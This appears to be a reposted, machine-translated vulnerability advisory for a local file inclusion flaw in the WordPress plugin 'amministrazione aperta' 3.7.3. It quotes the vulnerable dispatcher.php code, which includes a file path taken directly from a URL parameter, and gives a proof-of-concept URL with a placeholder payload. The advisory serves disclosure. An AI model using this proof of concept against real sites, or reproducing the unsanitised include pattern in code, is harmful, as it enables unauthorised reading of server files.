当前位置:网站首页>WordPress aministrazione aperta 3.7.3 arbitrary file reading

WordPress aministrazione aperta 3.7.3 arbitrary file reading

2022-04-21 12:06:00 Khan security team

# supply ​​ Business Homepage :https://wordpress.org/plugins/amministrazione-aperta/

# edition :3.7.3

# test : firefox

# Vulnerability file :dispatcher.php

# Vulnerability code :

```

if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
        <div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
                <div class="welcome-panel-column-container">';

    include_once( ABSPATH . WPINC . '/feed.php' );

```

# Proof of concept :

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

版权声明
本文为[Khan security team]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204211201158333.html

边栏推荐

猜你喜欢

随机推荐